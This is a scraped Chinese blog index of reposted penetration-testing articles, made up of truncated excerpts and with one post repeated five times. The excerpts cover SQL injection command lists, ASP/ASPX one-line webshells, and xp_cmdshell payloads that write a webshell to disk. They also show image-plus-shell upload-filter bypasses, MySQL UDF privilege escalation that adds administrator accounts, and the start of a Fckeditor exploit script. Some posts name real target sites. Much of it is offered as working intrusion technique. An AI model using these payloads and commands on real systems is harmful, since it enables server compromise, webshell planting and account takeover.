
渗透测试技术研究
eldn__
这个作者很懒,什么都没留下…
展开
-
最详细的SQL注入相关的命令整理
1、 用^转义字符来写ASP(一句话木马)文件的方法:? http://192.168.1.5/display.asp?keyno=1881;exec master.dbo.xp_cmdshell 'echo ^execute request^("l"^)^ >c:\mu.asp';--? echo ^ >c:\mu.asp2、 显示SQL系统版本:? http://192.168转载 2013-04-20 16:16:38 · 853 阅读 · 0 评论 -
最详细的SQL注入相关的命令整理
1、 用^转义字符来写ASP(一句话木马)文件的方法:? http://192.168.1.5/display.asp?keyno=1881;exec master.dbo.xp_cmdshell 'echo ^execute request^("l"^)^ >c:\mu.asp';--? echo ^ >c:\mu.asp2、 显示SQL系统版本:? http://192.168转载 2013-04-20 16:15:44 · 757 阅读 · 0 评论 -
最详细的SQL注入相关的命令整理
1、 用^转义字符来写ASP(一句话木马)文件的方法:? http://192.168.1.5/display.asp?keyno=1881;exec master.dbo.xp_cmdshell 'echo ^execute request^("l"^)^ >c:\mu.asp';--? echo ^ >c:\mu.asp2、 显示SQL系统版本:? http://192.168转载 2013-04-20 16:15:21 · 1072 阅读 · 0 评论 -
最详细的SQL注入相关的命令整理
1、 用^转义字符来写ASP(一句话木马)文件的方法:? http://192.168.1.5/display.asp?keyno=1881;exec master.dbo.xp_cmdshell 'echo ^execute request^("l"^)^ >c:\mu.asp';--? echo ^ >c:\mu.asp2、 显示SQL系统版本:? http://192.168转载 2013-04-20 16:15:08 · 638 阅读 · 0 评论 -
最详细的SQL注入相关的命令整理
1、 用^转义字符来写ASP(一句话木马)文件的方法:? http://192.168.1.5/display.asp?keyno=1881;exec master.dbo.xp_cmdshell 'echo ^execute request^("l"^)^ >c:\mu.asp';--? echo ^ >c:\mu.asp2、 显示SQL系统版本:? http://192.168转载 2013-04-20 16:14:59 · 1282 阅读 · 0 评论 -
三种后台登入框注入
http://www.2cto.com/Article/201111/110527.html以下是小菜新得 各位看管莫笑 老牛 飘过------废话不多说 开始第一种注入 后台dbo 权限拿websehll目标网站:http://bhst.edu.cn/manage/login.aspx判断有无注入 输入” a’” 返回错误页面—爆字转载 2013-04-18 21:07:32 · 8298 阅读 · 0 评论 -
Aspx 一句话木马和客户端(备用)
以下是引用片段:这个一句话不用说了!我之前已经发表文章讲解过!client端HTML页面代码如下以下是引用片段:I.S.T.O ASPX-C/S-SHELL 1.0 by kj021320body,td{font-size: 12px;}table{T:expression(this.border='1',this.borderColorLigh转载 2013-04-18 21:02:50 · 1714 阅读 · 0 评论 -
.NET aspx上传漏洞突破
.net文件上传过滤组件,过滤文件头,过滤文件尾,如果直接用工具插入是不行的,图片必须是一张可以预览的正常图片才可以上传!了解原理就好办了1.txt存放你的一句话马2.jpg 为一小图片文件,一定要小,比如qq表情图片3:copy /b 2.jpg+1.txt 3.jpg 这样就伪造了文件头,但是现在传上去还不行,我接下来就用4:copy /b 3.jpg+转载 2013-04-18 21:02:09 · 3752 阅读 · 0 评论 -
aspx后台登陆框post注入实战
摘要:后台登陆框post注入按照注入的方式属于post,和前台搜索型post注入、文本框注入类似,由于目前主流的注 入工具除了穿山甲等较新工具以外几乎都是get注入,尤其是对于这种后台账户型post注入式无能为力的,所以手工注入就显得尤为重要了,今天就用实战说 明一...后台登陆框post注入按照注入的方式属于post,和前台搜索型post注入、文本框注入类似,由于目前主流的注 入工具转载 2013-04-18 20:10:11 · 9464 阅读 · 0 评论 -
突破 Sql 防注入过滤程序继续注入的一点方法、经验、技巧总结
现在网上流传很多防注入代码。这些真的有用吗?这是在网上找的一个防注入代码例如:''''--------定义部份------------------ Dim Fy_Post,Fy_Get,Fy_In,Fy_Inf,Fy_Xh,Fy_db,Fy_dbstr ''''自定义需要过滤的字串,用 "|" 分隔 Fy_In = "''''|;|and|exec|insert|sel转载 2013-04-16 11:16:54 · 2588 阅读 · 0 评论 -
IIS写权限的利用
源地址:http://netsecurity.51cto.com/art/200812/101015.htm IIS写权限对网站系统的安全是致命的,拥有写权限可以直接往网站目录写文件,在拥有写权限的服务器上,其安全相对设置薄弱,因此比较容易被入侵者控制,本文就IIS写权限方面进行了研究。一、IIS写权限原理测试一个目录对于web用户是否具有写权限,采用如下方法: 1.转载 2012-10-28 10:36:05 · 12324 阅读 · 7 评论 -
利用谷歌来入侵
如果你输入[intitle:"Remote Desktop Web Connection"]你会发现… …很多你可以接管的远程桌面。同样简单的是你只要搜索[ssn 111111111..999999999 death records]就可以得到很多社会保险号码。在google中搜索[inurl:robot.txt],你将发现网站不想对外公开的文件和目录,例如Google MBD就是这样被发转载 2013-01-26 11:28:48 · 1932 阅读 · 0 评论 -
利用谷歌语法查找网站后台和数据库
搜索也是一门艺术在我们平时使用搜索引擎的过程中,通常是将需要搜索的关键字输入搜索引擎,然后就开始了漫长的信息提取过程。其实Google对于搜索的关键字提供了多种语法,合理使用这些语法,将使我们得到的搜索结果更加精确。当然,Google允许用户使用这些语法的目的是为了获得更加精确的结果,但是黑客却可以利用这些语法构造出特殊的关键字,使搜索的结果中绝大部分都是存在漏洞的网站。下面我们先来看看G转载 2013-01-26 11:34:50 · 6528 阅读 · 0 评论 -
Access注入点高级运用总结
信赖Access注入点是人人看到最多的了,一样平常敷衍 办法就是:猜表猜段猜内容---MD5---去靠山---看上传,备份,设置信息等等---上WEBSEHLL---提权.这是最常见和最普及 的ACCESS注入点应用行动 了.不外这里存在太多的不定因素,乐成 率非常低.任何一步失败,都也许让你不知怎样是好..但是ACCESS就只有这么点能耐了么?答案是否定 的.下面我们来看看,都有哪些转载 2012-12-21 15:18:36 · 902 阅读 · 0 评论 -
SQL入侵恢复xp_cmdshell方法总结
1433 SQL入侵恢复xp_cmdshell方法总结 sql server 2005下开启xp_cmdshell的办法 EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE; SQL2005开启'OPENROWSET'支持的方法转载 2013-04-20 16:32:07 · 2022 阅读 · 0 评论 -
asp aspx 注入练习代码
ASP: Dim Db,MyDbPathdim conn'可修改设置一:========================定义数据库类别,1为SQL数据库,0为Access数据库=============================Const IsSqlDataBase =0MyDbPath = ""'===============转载 2013-04-20 13:40:38 · 1606 阅读 · 0 评论 -
DB_OWNER权限得到mssql服务器IP的方法
http://www.myhack58.com/Article/html/3/7/2009/24978.htm现在注入横飞.工具一大堆,过去手工注入的时代已经不复存在.代之的是NBSI HDSI 啊D注入工具..等等.也是广大菜鸟的最爱了.即使什么也不会.什么也不懂.只需要点几下鼠标.存在注入漏洞的网站密码就出来了.接下来就是扫扫后台.传传马.就完了.就这样简单.碰到SA权限的话就转载 2013-04-21 00:15:19 · 1567 阅读 · 0 评论 -
火狐插件火狐黑客插件将Firefox变成黑客工具的七个插件
http://blog.youkuaiyun.com/stilling2006/article/details/7753592目前很多插件不支持 Firefox 3.5 哦1. Add N Edit Cookies 查看和修改本地的Cookie,Cookie欺骗必备。 下载:http://code.google.com/p/editcookie/downloads/list转载 2013-07-24 12:29:59 · 3037 阅读 · 0 评论 -
Fckeditor 2.6.3 漏洞 EXP
<?phperror_reporting(0);set_time_limit(0);ini_set("default_socket_timeout", 5);define(STDIN, fopen("php://stdin", "r"));$match = array();function http_send($host, $packet){$sock = fsockopen($h转载 2013-06-28 15:35:01 · 16757 阅读 · 0 评论 -
shell调用php脚本,并传递参数
http://blog.youkuaiyun.com/yaochunnian/article/details/8194189命令行执行带参数的php脚本,并取得参数张映 发表于 2011-07-15分类目录: php一,为什么我们要在命令行下运行php脚本呢?个人理解,主要有二个原因:1,利用crontab去跑php,可以给服务器减压,当然在转载 2013-06-28 15:34:00 · 9457 阅读 · 0 评论 -
Ewebeditor 的一些漏洞总结
于是像windows一样被黑客们挖掘出很多漏洞,大家莫急,笔者Minghacker总结前人基础,一一道来。 对于目前asp版本的ewebeditor编辑器漏洞主要分为以下7点: 默认,遍历目录漏洞,一句话,注入,构造,cookie欺骗,社工(踩脚印入侵), NO1.ewebeditor编辑器一般默认数据库路径是db/ewebeditor.mdb 默认的后台路径是admi转载 2013-06-23 21:35:39 · 10240 阅读 · 0 评论 -
Asp.net安全架构之1:xss(跨站脚本)
原文:http://www.cnblogs.com/luminji/archive/2012/05/22/2507185.html原理跨站脚本(Cross site script,简称xss)是一种“HTML注入”,由于攻击的脚本多数时候是跨域的,所以称之为“跨域脚本”。我们常常听到“注入”(Injection),如SQL注入,那么到底“注入”是什么?注入本质上就是把输入的数据转载 2013-06-06 17:05:21 · 897 阅读 · 0 评论 -
Web安全测试之XSS
原文:http://www.cnblogs.com/TankXiao/archive/2012/03/21/2337194.htmlWeb安全测试之XSSXSS 全称(Cross Site Scripting) 跨站脚本攻击, 是Web程序中最常见的漏洞。指攻击者在网页中嵌入客户端脚本(例如JavaScript), 当用户浏览此网页时,脚本就会在用户的浏览器上执行,从而达到转载 2013-06-06 17:03:46 · 889 阅读 · 0 评论 -
浅谈CSRF攻击方式
原文:http://www.cnblogs.com/hyddd/archive/2009/04/09/1432744.html一.CSRF是什么? CSRF(Cross-site request forgery),中文名称:跨站请求伪造,也被称为:one click attack/session riding,缩写为:CSRF/XSRF。二.CSRF可以做什么?转载 2013-06-06 11:27:39 · 838 阅读 · 0 评论 -
利用ewebeditor漏洞来攻击网站
原文:http://blog.163.com/chx_silk/blog/static/74422518200992214752475/大家好,今天给大家演示以下利用ewebeditor的程序漏洞入侵网站,首先:访问www.xxx.com/eWebEditorNet/Upload.aspx时,可以看到只有浏览,缺少了上传按钮如图:呵呵:不过没关系,在转载 2013-06-06 11:21:18 · 3856 阅读 · 0 评论 -
MSSQL手工注入语句集合
and exists (select * from sysobjects) //判断是否是MSSQLand exists(select * from tableName) //判断某表是否存在..tableName为表名and 1=(select @@VERSION) //MSSQL版本And 1=(select db_name()) //当前数据库名and 1转载 2013-06-03 19:20:51 · 1592 阅读 · 0 评论 -
mysql备份一句话
原文:http://www.uedbox.com/mysql-backup-a-eval/转载 2013-06-03 18:16:28 · 970 阅读 · 0 评论 -
mysql提权总结方法四则
一 UDF提权 这类提权方法我想大家已经知道了,我大致写一下,具体语句如下: create function cmdshell returns string soname ’udf.dll’ select cmdshell(’net user iis_user 123!@#abcABC /add’); select cmdshell(’net localgroup转载 2013-05-29 22:29:36 · 1685 阅读 · 0 评论 -
在有注入漏洞的SQL服务器上运行CMD命令
利用扩展存储过程xp_cmdshell来运行操作系统的控制台命令。这种方法也非常的简单,只需使用下面的SQL语句: EXEC master.dbo.xp_cmdshell 'dir c:\' 但是越来越多的数据库管理员已经意识到这个扩展存储过程的潜在危险,他们可能会将该存储过程的动态链接库xplog70.dll文件删除或改了名,这时侯许多人也许会放弃,因为我们无法运行任何的转载 2013-04-20 19:59:17 · 1216 阅读 · 0 评论 -
SQL2000的存储过程删除恢复
http://www.torylf.com/43.html1.xp_cmdshell被删除2.xp_cmdshell所使用的xplog70.dll被删除那么如果是第一中情况的话就很简单了,我们只需要恢复存储过程就可以了。恢复存储过程的语句如下:usemasterexecsp_addextendedproc xp_cmdshell,’xp_cmds转载 2013-04-20 18:21:10 · 945 阅读 · 0 评论 -
由一次登录表单注入引起的复习
很久没有玩这些东西了,感觉都有点健忘了,呵呵~~注入:很明显都是冲着数据库去的,凡是有注入漏洞的网站大都是由用户(浏览器)传参并带入数据库查询时检查不严格造成的。注入,从提交数据到Web服务器的方式上来讲分为2种:Get 和 Post 。 其中Get的表现形式有:在诸如:http://www.xxx.com/news_lists.asp?id=X-X-X,根据其传入原创 2013-04-21 14:18:17 · 1752 阅读 · 0 评论 -
ACCESS执行SQL语句导出一句话拿webshell
实用环境,在access后台其他方法不能拿到webshell但是后台有SQL语句查询执行,就可以直接access导出一句话拿webshell了不过需要知道物理路径才能导出,利用IIS的解析漏洞导出EXCEL文件拿到webshell,因为ACCESS数据库不允许导出其他危险格式。至于怎么拿到物理路径就看你自己发挥了,报错或备份路径等。逐一执行以下语句就可以导出一句话了转载 2012-12-21 15:55:52 · 7346 阅读 · 0 评论 -
一套webshell提权教程
前言:webshell提权一直就是脚本方面最受欢迎的一个问题,当然也是最困难的一个问题,所以我根据自己平时提权的一些方法和网络收集的文章总成了这一套webshell提权教程,希望大家能够学习到东西,也希望大家能够积极补充,共同进步!********************************************************************************转载 2012-12-30 10:20:13 · 17061 阅读 · 1 评论 -
SQL Server 2008 SA 权限 注入点 而我却无可奈何
大神们都这样说:这个是跨界要权的问题了要解决这个问题就要避免用本地系统帐户启动sqlserver指定一个存在于windows本地管理员的administrators组的用户来运行sqlserver服务,并且重启sqlserver解决办法:以管理员的身份运行SeverManagement Studio就可以了原创 2012-12-03 21:11:59 · 3424 阅读 · 0 评论 -
10个SQL注入工具
英文原文:darkreading,翻译:优快云众所周知,SQL注入攻击是最为常见的Web应用程序攻击技术。同时SQL注入攻击所带来的安全破坏也是不可弥补的。以下罗列的10款SQL工具可帮助管理员及时检测存在的漏洞。BSQL HackerBSQL Hacker是由Portcullis实验室开发的,BSQL Hacker 是一个SQL自动注入工具(支持SQL盲注),其设计的目的是希望转载 2012-12-02 21:40:10 · 1038 阅读 · 0 评论 -
MSSQL注入学习笔记
mssql权限:SA,DB_OWNER,PUBLIC判断权限的语句:SA权限: and 1 = (select IS_SRVROLEMEMBER('sysadmin'))DB_OWNER权限: and 1 = (select IS_SRVROLEMEMBER('db_owner'))PUBLIC权限: and 1 =1 (select IS_SRVROLEMEMBER('publi转载 2012-12-02 13:38:40 · 834 阅读 · 0 评论 -
ASPX一句话及一句话客户端
ASPX一句话:再给出aspx一句话客户端: ASPX one line Code Clientvar nonamed=new System.IO.StreamWriter(Server.MapPath("nonamed.aspx"),false);nonamed.Write(Request.Item["l"]);nonamed.Close();转载 2012-12-02 00:24:24 · 5826 阅读 · 0 评论 -
禁用java跳过本地验证实例
来源:习科技术论坛 作者:aijieyu目标:http://www.xxoo.com.cnASPX+access的+IIS7.5的站点那么多大神都搞过,要说存在什么注入和编辑器什么的大神们早就搞了!虽然这样扫描还是要扫的,但是我扫的是目录找到后台http://www.xxoo.com.cn/manage/login.aspx 弱口令什么的都是没有的,转载 2012-12-01 22:01:15 · 20090 阅读 · 0 评论 -
Sql Server 手工注入总结(显错模式)
--显错模式总结,利用类型转换报错。--1=convert(int,(@@version))--1=convert(int,(select host_name()))--and 1=convert(int,(user)) --爆表名记录条数。replace(字段名,' ','')select replace(str(count(*))+'N',' ','') from sy转载 2012-12-02 21:36:35 · 7451 阅读 · 0 评论 -
SQL2005/2008手工注入之批量爆数据for xml path
作者:佚名 时间:2012-04-15 19:55:11 最近测试了一个asp.net+sql2008旅游网站,找到一个搜索型注入点。输入单引号报错:接下来一个一个地列出数据库里有哪些表,先取第一个表名:and 1=2 union select 1,(select top 1 table_name frominformation_schema.tables),1,1,1转载 2012-12-02 14:51:48 · 1345 阅读 · 0 评论